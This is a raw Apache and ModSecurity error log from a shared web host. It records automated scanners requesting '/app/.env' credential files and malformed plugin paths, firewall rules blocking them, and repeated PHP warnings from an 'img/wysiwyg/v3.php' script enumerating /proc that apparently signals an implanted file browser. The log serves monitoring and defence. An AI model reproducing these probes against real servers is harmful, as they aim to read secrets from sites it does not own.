[Tue May 12 04:28:23.722356 2026] [proxy_fcgi:error] [pid 1709071:tid 1709111] [client 20.9.31.235:36883] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:23.845536 2026] [proxy_fcgi:error] [pid 1709071:tid 1709111] [client 20.9.31.235:36883] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:23.982673 2026] [proxy_fcgi:error] [pid 1709071:tid 1709111] [client 20.9.31.235:36883] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:24.105044 2026] [proxy_fcgi:error] [pid 1709071:tid 1709111] [client 20.9.31.235:36883] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:24.223604 2026] [proxy_fcgi:error] [pid 1709071:tid 1709111] [client 20.9.31.235:36883] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:24.357238 2026] [proxy_fcgi:error] [pid 1709071:tid 1709111] [client 20.9.31.235:36883] AH01071: Got error 'Primary script unknown'
PHP Warning:  filesize(): stat failed for /proc/66/task/66/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/66/task/66/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/66/task/66/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/66/task/66/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/66/task/66/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/66/task/66/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 04:28:29.114434 2026] [authz_core:error] [pid 1730175:tid 1730181] [client 47.128.23.245:27138] AH01630: client denied by server configuration: /home/castigli/public_html/wp-includes/blocks/error_log
PHP Warning:  filesize(): stat failed for /proc/552/task/552/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/552/task/552/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/552/task/552/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/552/task/552/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/552/task/552/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/552/task/552/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 04:29:02.981264 2026] [security2:error] [pid 1808852:tid 1808856] [client 95.217.109.26:64442] ModSecurity: Warning. Invalid URL Encoding: Non-hexadecimal digits used at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "211"] [id "920220"] [rev "2"] [msg "URL Encoding Abuse Attack Attempt"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "la-grande-fabrique.com"] [uri "/wp-content/plugins/nextgen-gallery/static/I18N/\\"%1$s/\\""] [unique_id "agKQbhfeipD4uoG21Fod0wAAAAE"]
[Tue May 12 04:29:04.592191 2026] [security2:error] [pid 1707624:tid 1707701] [client 95.217.109.26:64444] ModSecurity: Warning. Invalid URL Encoding: Non-hexadecimal digits used at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "211"] [id "920220"] [rev "2"] [msg "URL Encoding Abuse Attack Attempt"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "la-grande-fabrique.com"] [uri "/wp-content/plugins/nextgen-gallery/static/I18N/\\"%s/\\""] [unique_id "agKQcLOxS7i6i_mT2NLrWAAAAFM"]
[Tue May 12 04:29:25.248249 2026] [security2:error] [pid 1730175:tid 1730190] [client 43.134.93.181:43366] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/la-brasserie"] [unique_id "agKQhXo6NvB9WXx5V-6aXAAAAQ0"]
[Tue May 12 04:29:30.360503 2026] [security2:error] [pid 1709071:tid 1709097] [client 129.226.83.4:36784] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKQirvMumyrWMfSu7rKxAAAAMo"]
[Tue May 12 04:29:31.008026 2026] [security2:error] [pid 1730175:tid 1730193] [client 43.134.93.181:50380] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/la-brasserie/"] [unique_id "agKQi3o6NvB9WXx5V-6aXgAAARA"], referer: http://www.labaujue.com/la-brasserie
[Tue May 12 04:29:47.874850 2026] [security2:error] [pid 1730175:tid 1730196] [client 43.167.239.66:49152] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/bouclettes/"] [unique_id "agKQm3o6NvB9WXx5V-6acQAAARM"]
[Tue May 12 04:30:00.115529 2026] [:error] [pid 1730175:tid 1730193] [client 114.119.136.64:34019] File does not exist: /home/totalcloud/public_html/index.php, referer: https://totalcloud.fr/webshop?ccce=index&systpl=six&language=chinese
[Tue May 12 04:31:29.056880 2026] [:error] [pid 1820198:tid 1820200] [client 114.119.146.40:28543] File does not exist: /home/totalcloud/public_html/index.php, referer: https://totalcloud.fr/webshop
[Tue May 12 04:32:41.306818 2026] [security2:error] [pid 1709071:tid 1709090] [client 102.165.5.36:42497] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKRSbvMumyrWMfSu7rMEgAAAMM"], referer: https://www.piregwan-genesis.com/
[Tue May 12 04:32:48.459902 2026] [security2:error] [pid 1709071:tid 1709103] [client 49.51.180.2:60384] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/page.php"] [unique_id "agKRULvMumyrWMfSu7rMJQAAANA"]
[Tue May 12 04:32:54.247326 2026] [ssl:error] [pid 1730175:tid 1730178] (EAI 2)Name or service not known: [client 3.87.132.21:40984] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 04:32:54.247374 2026] [ssl:error] [pid 1730175:tid 1730178] AH01941: stapling_renew_response: responder error
[Tue May 12 04:32:54.807941 2026] [ssl:error] [pid 1820198:tid 1820215] (EAI 2)Name or service not known: [client 3.87.132.21:40994] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 04:32:54.807986 2026] [ssl:error] [pid 1820198:tid 1820215] AH01941: stapling_renew_response: responder error
[Tue May 12 04:33:03.975916 2026] [authz_core:error] [pid 1730207:tid 1730220] [client 47.128.23.40:35072] AH01630: client denied by server configuration: /home/castigli/public_html/wp-includes/rest-api/search/error_log
[Tue May 12 04:33:18.085868 2026] [security2:error] [pid 1808852:tid 1808878] [client 101.33.66.34:46628] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "krakoukas.com"] [uri "/category/informatique/realisations/"] [unique_id "agKRbhfeipD4uoG21FofnQAAABc"]
PHP Warning:  filesize(): stat failed for /proc/216/task/216/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/216/task/216/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/216/task/216/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/216/task/216/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/216/task/216/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/216/task/216/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 04:33:18.571272 2026] [security2:error] [pid 1730207:tid 1730212] [client 176.65.139.232:53512] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agKRbjue9Sp-pIv_Bb6yegAAAUM"]
[Tue May 12 04:33:18.571498 2026] [security2:error] [pid 1730207:tid 1730212] [client 176.65.139.232:53512] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agKRbjue9Sp-pIv_Bb6yegAAAUM"]
[Tue May 12 04:33:20.182399 2026] [security2:error] [pid 1730207:tid 1730212] [client 176.65.139.232:53512] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agKRbjue9Sp-pIv_Bb6yegAAAUM"]
[Tue May 12 04:33:46.260335 2026] [security2:error] [pid 1730175:tid 1730198] [client 176.65.139.229:55934] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/app/.env"] [unique_id "agKRino6NvB9WXx5V-6b3QAAARU"]
[Tue May 12 04:33:46.260552 2026] [security2:error] [pid 1730175:tid 1730198] [client 176.65.139.229:55934] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/app/.env"] [unique_id "agKRino6NvB9WXx5V-6b3QAAARU"]
[Tue May 12 04:33:46.260788 2026] [security2:error] [pid 1730175:tid 1730198] [client 176.65.139.229:55934] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/app/.env"] [unique_id "agKRino6NvB9WXx5V-6b3QAAARU"]
[Tue May 12 04:33:49.236823 2026] [security2:error] [pid 1730207:tid 1730209] [client 15.235.145.59:62524] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php?url=https:/kawscompanionart.com"] [unique_id "agKRjTue9Sp-pIv_Bb6yugAAAUA"]
[Tue May 12 04:33:49.237329 2026] [security2:error] [pid 1730207:tid 1730209] [client 15.235.145.59:62524] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php?url=https:/kawscompanionart.com"] [unique_id "agKRjTue9Sp-pIv_Bb6yugAAAUA"]
[Tue May 12 04:33:49.237578 2026] [security2:error] [pid 1730207:tid 1730209] [client 15.235.145.59:62524] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php?url=https:/kawscompanionart.com"] [unique_id "agKRjTue9Sp-pIv_Bb6yugAAAUA"]
[Tue May 12 04:33:54.399014 2026] [security2:error] [pid 1730207:tid 1730219] [client 15.235.145.59:63093] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php?url=https:/kawscompanionart.com"] [unique_id "agKRkjue9Sp-pIv_Bb6yvgAAAUo"], referer: https://www.piregwan-genesis.com
[Tue May 12 04:33:54.399517 2026] [security2:error] [pid 1730207:tid 1730219] [client 15.235.145.59:63093] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php?url=https:/kawscompanionart.com"] [unique_id "agKRkjue9Sp-pIv_Bb6yvgAAAUo"], referer: https://www.piregwan-genesis.com
[Tue May 12 04:33:54.399778 2026] [security2:error] [pid 1730207:tid 1730219] [client 15.235.145.59:63093] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php?url=https:/kawscompanionart.com"] [unique_id "agKRkjue9Sp-pIv_Bb6yvgAAAUo"], referer: https://www.piregwan-genesis.com
[Tue May 12 04:34:17.527024 2026] [autoindex:error] [pid 1820198:tid 1820208] [client 54.210.34.240:49002] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1720864/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1720864/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1720864/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1720864/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1720864/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1720864/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 04:34:49.038743 2026] [ssl:error] [pid 1820198:tid 1820218] (EAI 2)Name or service not known: [client 54.226.210.74:54752] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 04:34:49.038807 2026] [ssl:error] [pid 1820198:tid 1820218] AH01941: stapling_renew_response: responder error
[Tue May 12 04:34:50.637678 2026] [ssl:error] [pid 1730207:tid 1730225] (EAI 2)Name or service not known: [client 54.226.210.74:41156] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 04:34:50.637713 2026] [ssl:error] [pid 1730207:tid 1730225] AH01941: stapling_renew_response: responder error
[Tue May 12 04:35:16.615434 2026] [security2:error] [pid 1730207:tid 1730223] [client 43.156.122.201:46616] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "manhattan-studio.fr"] [uri "/"] [unique_id "agKR5Due9Sp-pIv_Bb6zVwAAAU4"], referer: http://manhattan-studio.fr
[Tue May 12 04:35:45.837031 2026] [core:error] [pid 1820198:tid 1820206] [client 52.141.35.48:13311] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:35:45.837064 2026] [core:error] [pid 1820198:tid 1820206] [client 52.141.35.48:13311] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:35:46.549369 2026] [core:error] [pid 1730175:tid 1730197] [client 52.141.35.48:9747] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:35:46.549393 2026] [core:error] [pid 1730175:tid 1730197] [client 52.141.35.48:9747] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:35:47.259830 2026] [core:error] [pid 1730207:tid 1730221] [client 52.141.35.48:13364] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:35:47.259865 2026] [core:error] [pid 1730207:tid 1730221] [client 52.141.35.48:13364] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:35:47.963091 2026] [core:error] [pid 1808852:tid 1808877] [client 52.141.35.48:13301] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:35:47.963117 2026] [core:error] [pid 1808852:tid 1808877] [client 52.141.35.48:13301] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:35:48.703346 2026] [core:error] [pid 1820198:tid 1820207] [client 52.141.35.48:9734] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:35:48.703377 2026] [core:error] [pid 1820198:tid 1820207] [client 52.141.35.48:9734] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:35:49.426099 2026] [core:error] [pid 1730207:tid 1730210] [client 52.141.35.48:13300] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:35:49.426128 2026] [core:error] [pid 1730207:tid 1730210] [client 52.141.35.48:13300] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:35:50.132171 2026] [core:error] [pid 1808852:tid 1808855] [client 52.141.35.48:13358] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:35:50.132202 2026] [core:error] [pid 1808852:tid 1808855] [client 52.141.35.48:13358] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:35:50.909900 2026] [core:error] [pid 1730207:tid 1730218] [client 52.141.35.48:3734] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:35:50.909930 2026] [core:error] [pid 1730207:tid 1730218] [client 52.141.35.48:3734] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
